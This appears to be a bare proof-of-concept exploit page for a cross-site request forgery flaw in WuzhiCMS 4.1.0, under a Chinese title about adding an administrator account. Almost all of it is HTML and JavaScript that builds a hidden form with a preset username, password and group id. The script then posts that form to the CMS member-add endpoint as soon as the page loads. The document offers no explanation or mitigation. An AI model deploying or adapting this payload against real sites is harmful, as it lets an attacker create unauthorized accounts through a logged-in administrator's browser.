五指CMS 4.1.0 管理员账户新增CSRF漏洞

CSRF2

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='infousername' value='hack123' />";
fields += "<input type='hidden' name='infopassword' value='hacktest' />"; 
fields += "<input type='hidden' name='infopwdconfirm' value='hacktest' />"; 
fields += "<input type='hidden' name='infoemail' value='email protected' />"; 
fields += "<input type='hidden' name='infomobile' value='' />"; 
fields += "<input type='hidden' name='modelids' value='10' />"; 
fields += "<input type='hidden' name='infogroupid' value='3' />"; 
fields += "<input type='hidden' name='pids' value='0' />"; 
fields += "<input type='hidden' name='pids' value='0' />"; 
fields += "<input type='hidden' name='pids' value='0' />";
fields += "<input type='hidden' name='pids' value='0' />"; 
fields += "<input type='hidden' name='avatar' value='' />"; 
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='infobirthday' value='' />"; 
fields += "<input type='hidden' name='infotruename' value='' />"; 
fields += "<input type='hidden' name='infosex' value='0' />";
fields += "<input type='hidden' name='infomarriage' value='0' />";

var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=提交";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>